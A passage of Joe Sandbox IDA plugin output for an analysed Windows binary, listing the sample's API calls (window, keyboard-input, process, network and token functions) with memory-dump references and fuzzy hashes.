                                    • Opcode ID: 2f9441ec44068b547fc3da2e7562236bdd0a5026767ad41ae18d88875001e82f
                                    • Instruction ID: fdcafd98a9254b8c56aa77b9f8c43249c54e9e823eee82da22121c98d32a8112
                                    • Opcode Fuzzy Hash: 2f9441ec44068b547fc3da2e7562236bdd0a5026767ad41ae18d88875001e82f
                                    • Instruction Fuzzy Hash: 9951BA306247069BDB24AF69D9D5BAEB3E9EF85324F20881FE756C72D1DB349881C701
                                    APIs
                                    • GetWindowRect.USER32(00C98820,?), ref: 009EC544
                                    • ScreenToClient.USER32(?,00000002), ref: 009EC574
                                    • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 009EC5DA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$ClientMoveRectScreen
                                    • String ID:
                                    • API String ID: 3880355969-0
                                    • Opcode ID: 376aa2ff79a8264f3811c0efd42376c872edbc27d79f8b6355b9b792accf0f2b
                                    • Instruction ID: f8114fe27cc30cd16a31e7187209b9f9113c09ee70af26d1a7397635c161ae32
                                    • Opcode Fuzzy Hash: 376aa2ff79a8264f3811c0efd42376c872edbc27d79f8b6355b9b792accf0f2b
                                    • Instruction Fuzzy Hash: F75196B5900249EFCF11DFA9C880AAE77B9FF85720F108659F89597291D730ED82CB50
                                    APIs
                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 009BC462
                                    • __itow.LIBCMT ref: 009BC49C
                                      • Part of subcall function 009BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 009BC753
                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 009BC505
                                    • __itow.LIBCMT ref: 009BC55A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$__itow
                                    • String ID:
                                    • API String ID: 3379773720-0
                                    APIs
                                    • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 009C3966
                                    • SetKeyboardState.USER32(00000080,?,00000001), ref: 009C3982
                                    • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009C39EF
                                    • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 009C3A4D
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    APIs
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 009CE742
                                    • GetLastError.KERNEL32(?,00000000), ref: 009CE768
                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 009CE78D
                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 009CE7B9
                                    Similarity
                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                    • String ID:
                                    • API String ID: 3321077145-0
                                    APIs
                                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009EB5D1
                                    Similarity
                                    • API ID: InvalidateRect
                                    • String ID:
                                    • API String ID: 634782764-0
                                    APIs
                                    • ClientToScreen.USER32(?,?), ref: 009ED807
                                    • GetWindowRect.USER32(?,?), ref: 009ED87D
                                    • PtInRect.USER32(?,?,009EED5A), ref: 009ED88D
                                    • MessageBeep.USER32(00000000), ref: 009ED8FE
                                    Similarity
                                    • API ID: Rect$BeepClientMessageScreenWindow
                                    • String ID:
                                    • API String ID: 1352109105-0
                                    APIs
                                    • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 009C3AB8
                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 009C3AD4
                                    • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 009C3B34
                                    • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 009C3B92
                                    Similarity
                                    • API ID: KeyboardState$InputMessagePostSend
                                    • String ID:
                                    • API String ID: 432972143-0
                                    APIs
                                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009B4038
                                    • __isleadbyte_l.LIBCMT ref: 009B4066
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009B4094
                                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009B40CA
                                    Similarity
                                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                    • String ID:
                                    • API String ID: 3058430110-0
                                    APIs
                                    • GetForegroundWindow.USER32 ref: 009E7CB9
                                      • Part of subcall function 009C5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 009C5F6F
                                      • Part of subcall function 009C5F55: GetCurrentThreadId.KERNEL32 ref: 009C5F76
                                      • Part of subcall function 009C5F55: AttachThreadInput.USER32(00000000,?,009C781F), ref: 009C5F7D
                                    • GetCaretPos.USER32(?), ref: 009E7CCA
                                    • ClientToScreen.USER32(00000000,?), ref: 009E7D03
                                    • GetForegroundWindow.USER32 ref: 009E7D09
                                    Similarity
                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                    • String ID:
                                    • API String ID: 2759813231-0
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009D4358
                                      • Part of subcall function 009D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009D4401
                                      • Part of subcall function 009D43E2: InternetCloseHandle.WININET(00000000), ref: 009D449E
                                    Similarity
                                    • API ID: Internet$CloseConnectHandleOpen
                                    • String ID:
                                    • API String ID: 1463438336-0
                                    APIs
                                    • GetWindowLongW.USER32(?,000000EC), ref: 009E8AA6
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009E8AC0
                                    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 009E8ACE
                                    • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 009E8ADC
                                    Similarity
                                    • API ID: Window$Long$AttributesLayered
                                    • String ID:
                                    • API String ID: 2169480361-0
                                    APIs
                                    • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 009D8AE0
                                    • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 009D8AF2
                                    • accept.WSOCK32(00000000,00000000,00000000), ref: 009D8AFF
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D8B16
                                    Similarity
                                    • API ID: ErrorLastacceptselect
                                    • String ID:
                                    • API String ID: 385091864-0
                                    APIs
                                      • Part of subcall function 009C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,009C0ABB,?,?,?,009C187A,00000000,000000EF,00000119,?,?), ref: 009C1E77
                                      • Part of subcall function 009C1E68: lstrcpyW.KERNEL32(00000000,?,?,009C0ABB,?,?,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C1E9D
                                      • Part of subcall function 009C1E68: lstrcmpiW.KERNEL32(00000000,?,009C0ABB,?,?,?,009C187A,00000000,000000EF,00000119,?,?), ref: 009C1ECE
                                    • lstrlenW.KERNEL32(?,00000002,?,?,?,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C0AD4
                                    • lstrcpyW.KERNEL32(00000000,?,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C0AFA
                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C0B2E
                                    Similarity
                                    • API ID: lstrcmpilstrcpylstrlen
                                    • String ID: cdecl
                                    • API String ID: 4031866154-3896280584
                                    APIs
                                    • _free.LIBCMT ref: 009B2FB5
                                      • Part of subcall function 009A395C: __FF_MSGBANNER.LIBCMT ref: 009A3973
                                      • Part of subcall function 009A395C: __NMSG_WRITE.LIBCMT ref: 009A397A
                                      • Part of subcall function 009A395C: RtlAllocateHeap.NTDLL(00C70000,00000000,00000001,00000001,00000000,?,?,0099F507,?,0000000E), ref: 009A399F
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    APIs
                                    • _memset.LIBCMT ref: 0099EBB2
                                      • Part of subcall function 009851AF: _memset.LIBCMT ref: 0098522F
                                      • Part of subcall function 009851AF: _wcscpy.LIBCMT ref: 00985283
                                      • Part of subcall function 009851AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00985293
                                    • KillTimer.USER32(?,00000001,?,?), ref: 0099EC07
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0099EC16
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 009F3C88
                                    Similarity
                                    • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                    • String ID:
                                    • API String ID: 1378193009-0
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009C05AC
                                    • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009C05C7
                                    • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009C05DD
                                    • FreeLibrary.KERNEL32(?), ref: 009C0632
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                    • String ID:
                                    • API String ID: 3137044355-0
                                    • Opcode ID: 4730f14a5fd3060e064bdd984e5753f11de1f2a8e87fa10d7d4c364ffff39864
                                    • Instruction ID: ba932f8cc20bdafa941f3ef42bc826610440d553843c69902535de92f71a3bb8
                                    • Opcode Fuzzy Hash: 4730f14a5fd3060e064bdd984e5753f11de1f2a8e87fa10d7d4c364ffff39864
                                    • Instruction Fuzzy Hash: A8215E71D00209EBDB20CFD1DD88FDABBB8EB80700F008A6DA516A6050D774EA559B62
                                    APIs
                                    • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009C6733
                                    • _memset.LIBCMT ref: 009C6754
                                    • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009C67A6
                                    • CloseHandle.KERNEL32(00000000), ref: 009C67AF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseControlCreateDeviceFileHandle_memset
                                    • String ID:
                                    • API String ID: 1157408455-0
                                    • Opcode ID: d43cfc31e056aa7a19e4a7723dcaf9ff6bf107cc5c6e441e2ea6cc89b05381e1
                                    • Instruction ID: 4013db09a9df87430387817978941da04c46117edbb79506772bf77248095547
                                    • Opcode Fuzzy Hash: d43cfc31e056aa7a19e4a7723dcaf9ff6bf107cc5c6e441e2ea6cc89b05381e1
                                    • Instruction Fuzzy Hash: 7A11E372D012287AE7209BA5AC4DFABBABCEF44724F10469AF504E71C0D2744E818BB5
                                    APIs
                                      • Part of subcall function 009BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009BAA79
                                      • Part of subcall function 009BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009BAA83
                                      • Part of subcall function 009BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009BAA92
                                      • Part of subcall function 009BAA62: RtlAllocateHeap.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009BAA99
                                      • Part of subcall function 009BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009BAAAF
                                    • GetLengthSid.ADVAPI32(?,00000000,009BADE4,?,?), ref: 009BB21B
                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009BB227
                                    • RtlAllocateHeap.KERNEL32(00000000), ref: 009BB22E
                                    • CopySid.ADVAPI32(?,00000000,?), ref: 009BB247
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Heap$AllocateInformationProcessToken$CopyErrorLastLength
                                    • String ID:
                                    • API String ID: 259861997-0
                                    • Opcode ID: 6374a884fdc71918e64fd053d0649d765ca5fb05efa1d82785386914f7606997
                                    • Instruction ID: 8cdd09c6e6e012db11b183c998d656e87e3717b79f065d400ba41f2995106d39
                                    • Opcode Fuzzy Hash: 6374a884fdc71918e64fd053d0649d765ca5fb05efa1d82785386914f7606997
                                    • Instruction Fuzzy Hash: 9611C172A00209EFCB04DF98DE85AEEB7BDEF94324F14842DE95297250D771AE45CB10
                                    APIs
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009BB498
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4AA
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4C0
                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4DB
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: 0473f0c73cd4896781e71c87c2e196984c977551506435d3d63b7015a06ee839
                                    • Instruction ID: 394e054c74d0dcd5cc4b2817aad2b0ac95cf61a3d9bb344deb98a1337eaf2cd0
                                    • Opcode Fuzzy Hash: 0473f0c73cd4896781e71c87c2e196984c977551506435d3d63b7015a06ee839
                                    • Instruction Fuzzy Hash: BA11487A900218FFDB11DFA8C981EDDBBB9FB08710F204091E604B7290D771AE11DB94
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 009C7352
                                    • MessageBoxW.USER32(?,?,?,?), ref: 009C7385
                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009C739B
                                    • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009C73A2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                    • String ID:
                                    • API String ID: 2880819207-0
                                    • Opcode ID: bd503fd56cd125ad19e2fcafe0617a30a655cea55b15f523d3d2fec158f407ce
                                    • Instruction ID: b8889ea6bad486451a87a50d5b30f80cb7f738273f1ec77adf355ee69ba3ddd0
                                    • Opcode Fuzzy Hash: bd503fd56cd125ad19e2fcafe0617a30a655cea55b15f523d3d2fec158f407ce
                                    • Instruction Fuzzy Hash: 2511E577A04258BBCB01DBE89C05FDEBBAD9B85324F044319F821D3291D6B189029FA1
                                    APIs
                                    • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                    • GetStockObject.GDI32(00000011), ref: 0099D1CE
                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateMessageObjectSendStockWindow
                                    • String ID:
                                    • API String ID: 3970641297-0
                                    • Opcode ID: 92b65e2f37ce341083806b006b958a6d928dab28b29f53462f4b4fd38a07e733
                                    • Instruction ID: f2a2682d316aacb568e5340bac4da6a9c1d8c107f10af0a273b79beb82ab45f2
                                    • Opcode Fuzzy Hash: 92b65e2f37ce341083806b006b958a6d928dab28b29f53462f4b4fd38a07e733
                                    • Instruction Fuzzy Hash: 0B118B7310650DBFEF268FD89C90EEABB6EFF19364F040105FA1552060C7329C629BA0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                    • String ID:
                                    • API String ID: 3016257755-0
                                    • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                    • Instruction ID: a72d1a3ea0da921459526e574d5be0e0d00c2c308c89878973b0116e6701262f
                                    • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                    • Instruction Fuzzy Hash: 9A01493200014EBBCF125E84DE059EE3F67BB58360B598455FE2859132D336DAB2BB81
                                    APIs
                                      • Part of subcall function 009A7A0D: __getptd_noexit.LIBCMT ref: 009A7A0E
                                    • __lock.LIBCMT ref: 009A748F
                                    • InterlockedDecrement.KERNEL32(?), ref: 009A74AC
                                    • _free.LIBCMT ref: 009A74BF
                                    • InterlockedIncrement.KERNEL32(00C830C8), ref: 009A74D7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                    • String ID:
                                    • API String ID: 2704283638-0
                                    • Opcode ID: f74b1beac548dc6d550168576db1ddcd946c562d62b7baf927ace108970286d6
                                    • Instruction ID: e74b2aaa14292035a67d110b9218181065f38d888ae4fa3db5ad606e5371216c
                                    • Opcode Fuzzy Hash: f74b1beac548dc6d550168576db1ddcd946c562d62b7baf927ace108970286d6
                                    • Instruction Fuzzy Hash: F901D232909A21ABC712EFE59C0B75DFBB5BF4A721F148019F854A76A0CB345902CFD2
                                    APIs
                                    • __lock.LIBCMT ref: 009A7AD8
                                      • Part of subcall function 009A7CF4: __mtinitlocknum.LIBCMT ref: 009A7D06
                                      • Part of subcall function 009A7CF4: RtlEnterCriticalSection.KERNEL32(00000000,?,009A7ADD,0000000D), ref: 009A7D1F
                                    • InterlockedIncrement.KERNEL32(?), ref: 009A7AE5
                                    • __lock.LIBCMT ref: 009A7AF9
                                    • ___addlocaleref.LIBCMT ref: 009A7B17
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1687444384-0
                                    • Opcode ID: b4e4bd7211dff80ed91cba5969dfcbb3d9377e0df3ce37ba301b1d02b7157393
                                    • Instruction ID: 2060e8d4f53595837c6f27dafcf16c8d905e1a0f476c30ec6d910970e583995f
                                    • Opcode Fuzzy Hash: b4e4bd7211dff80ed91cba5969dfcbb3d9377e0df3ce37ba301b1d02b7157393
                                    • Instruction Fuzzy Hash: 1F011B72504B00AED721DFA5D90674AF7F0AF91325F20890EA49A966A0CB74A645CB91
                                    APIs
                                    • _memset.LIBCMT ref: 009EE33D
                                    • _memset.LIBCMT ref: 009EE34C
                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00A43D00,00A43D44), ref: 009EE37B
                                    • CloseHandle.KERNEL32 ref: 009EE38D
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: _memset$CloseCreateHandleProcess
                                    • String ID:
                                    • API String ID: 3277943733-0
                                    • Opcode ID: 7fef4d8124f0ca4bd3d8cbf602b9dcd956f49a1fd0b6a76e122d210147fe29b4
                                    • Instruction ID: 4c8282847733270231fab82f021306d46b8531493b6c60fe1e2a371028820925
                                    • Opcode Fuzzy Hash: 7fef4d8124f0ca4bd3d8cbf602b9dcd956f49a1fd0b6a76e122d210147fe29b4
                                    • Instruction Fuzzy Hash: 70F089FB9403047EE71097E5AC45F777E6CD745758F104821FE04D61A2D3765D1146A4
                                    APIs
                                      • Part of subcall function 0099AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0099AFE3
                                      • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099AFF2
                                      • Part of subcall function 0099AF83: BeginPath.GDI32(?), ref: 0099B009
                                      • Part of subcall function 0099AF83: SelectObject.GDI32(?,00000000), ref: 0099B033
                                    • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 009EEA8E
                                    • LineTo.GDI32(00000000,?,?), ref: 009EEA9B
                                    • EndPath.GDI32(00000000), ref: 009EEAAB
                                    • StrokePath.GDI32(00000000), ref: 009EEAB9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                    • String ID:
                                    • API String ID: 1539411459-0
                                    • Opcode ID: 65267f76f000ba7dcc015188f8daae7f3e59a73d5ac59ae4001d4a5fa6c2ec1d
                                    • Instruction ID: ce6c54057da6545b9c731c934fd032dabd1ef74562250ddaabe3c31802f660dd
                                    • Opcode Fuzzy Hash: 65267f76f000ba7dcc015188f8daae7f3e59a73d5ac59ae4001d4a5fa6c2ec1d
                                    • Instruction Fuzzy Hash: 68F05E36005259BBDB12DFD4AD09FCA3F19AF06311F044201FE16610E187759563CBD5
                                    APIs
                                    • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009BC84A
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 009BC85D
                                    • GetCurrentThreadId.KERNEL32 ref: 009BC864
